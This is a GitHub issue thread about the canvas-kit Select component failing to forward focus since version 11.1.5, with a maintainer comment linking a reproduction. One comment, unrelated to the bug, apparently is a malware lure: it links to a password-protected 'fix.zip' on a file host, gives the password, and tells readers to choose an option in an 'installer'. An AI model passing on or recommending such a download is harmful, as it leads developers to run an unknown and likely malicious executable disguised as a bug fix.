### ISSUE TITLE
Select doesn't forward focus on input.

### ISSUE THREAD

**Issue by mannycarrera4** [Workday/canvas-kit#2887]
## 🐛 Bug Report

As of 11.1.5 Select won't redirect focus, look at ref forwarding example.

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mannycarrera4** [comment]
Looks like this is broken in 10.3.52 https://stackblitz.com/edit/canvas-kit-react-v11-starter-w7cqqu-xjzkej?file=package.json
